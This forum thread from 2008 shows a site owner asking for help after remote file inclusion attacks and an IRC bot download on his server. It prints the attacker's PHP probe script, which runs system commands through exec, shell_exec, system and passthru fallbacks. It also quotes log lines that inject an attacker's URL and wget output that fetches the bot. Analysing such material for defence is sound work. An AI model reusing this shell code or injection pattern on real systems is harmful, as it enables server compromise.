Page 1 of 1

PHP Injection Exploit

Posted: Mon Mar 24, 2008 10:08 pm
by bcarpio
I keep seeing these in my logs (xxx.xxx.xxx.xxx is my servers IP)

xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:13 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"


xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:17 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"


You will notice the 200 success code.

If you download this gambar.jpg file, you will see that it is a php script:

------- start gambar.jpg -------

Code: Select all

<?
$dir = @getcwd();
$ker = @php_uname();
echo "3"."1"."3"."3"."7"."<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
} 
 
echo "<br>3"."1"."2"."3"."4<br>";
?>
--------------------------------------------

My hosting company has alerted me to this issue, I'm not sure what this script does that allows for a PHP injection if anything... if someone can help me put the pieces together that would be great.

Re: PHP Injection Exploit

Posted: Mon Mar 24, 2008 10:24 pm
by Weirdan
Are you running aMember Pro?

Re: PHP Injection Exploit

Posted: Mon Mar 24, 2008 10:55 pm
by bcarpio
No,

There are 100s of logs from the attacker searching for aMember Pro to phpBB... but I am not running any of them... the thing is that the site that shows the 200 is just a static HTML site.. the rest of my sites run Joomla but I don't see any of these in the logs for the sites running Joomla.

The other odd thing is that the pk.txt file is uploaded to /tmp/.ICE-unix

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 1:36 am
by Mordred
1. It's getting a 200, because it's requesting / (which exists)
The other text is after the ?, meaning it's part of the query.

2. Have you tried accessing the same URL on your server to see what happens? My guess is - nothing.
It's just a stupid bot trying its luck with you.

3. Wait... what pk.txt ?

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 8:01 am
by bcarpio
Yes, I believe that somehow this script hidden in gambar.jpg is somehow allowing my server to be exploited. If you see this:
http://imoet.100webspace.net/gambar.jpg

Now let me show you an exert from my error_log:

-------------------------------------------

error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--04:48:44-- http://imoet.100webspace.net/pk.txt
Resolving imoet.100webspace.net... 64.72.112.169
Connecting to imoet.100webspace.net|64.72.112.169|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84143 (82K) [text/plain]
Saving to: `pk.txt'

0K .......... .......... .......... .......... .......... 60% 239K 0s
50K .......... .......... .......... .. 100% 622K=0.3s

04:48:44 (315 KB/s) - `pk.txt' saved [84143/84143]

error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key

-----------------------------------

You can see that this site is somehow exploiting my server to upload a pk.txt file. This PK.txt file is an IRC bot which eventually is used to attack other sites, but I assume that the initial attack begins with the gambar.jpg.

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 8:57 am
by Mordred
1. Disable this if you're not using it:
http://bg.php.net/manual/en/ref.filesys ... -url-fopen

2. Copy your logs aside, collect all occurances like the ones you showed us. Maybe the bot is trying a few known RFI holes and is finding one - finding which one will allow you to patch the root cause of the vulnerability.

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 9:32 am
by bcarpio
Yea I have register_globals = Off and allow_url_fopen = Off.

I guess all I can really do is keep going through the logs and try and find a URL they passed that "worked". ?

Any other suggestions?

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 10:21 am
by Mordred
If you're sure you have allow_url_fopen = Off, then the hole being exploited is NOT RFI.

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 1:47 pm
by Weirdan
bcarpio wrote: Now let me show you an exert from my error_log:
[.................................]
--04:48:44-- http://imoet.100webspace.net/pk.txt
Resolving imoet.100webspace.net... 64.72.112.169
Connecting to imoet.100webspace.net|64.72.112.169|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84143 (82K) [text/plain]
Saving to: `pk.txt'

0K .......... .......... .......... .......... .......... 60% 239K 0s
50K .......... .......... .......... .. 100% 622K=0.3s

04:48:44 (315 KB/s) - `pk.txt' saved [84143/84143]
[...............................]
Looks like an output from wget

Re: PHP Injection Exploit

Posted: Tue Mar 25, 2008 2:03 pm
by bcarpio
Hmm apparently my problem is related to this:

http://www.heise-online.co.uk/security/ ... news/75459

I use joomla on almost all of my sites, although I am not running this "Perform" component there must be another component that is being compromised. The odd thing is I do have register_globals=Off in my php.ini.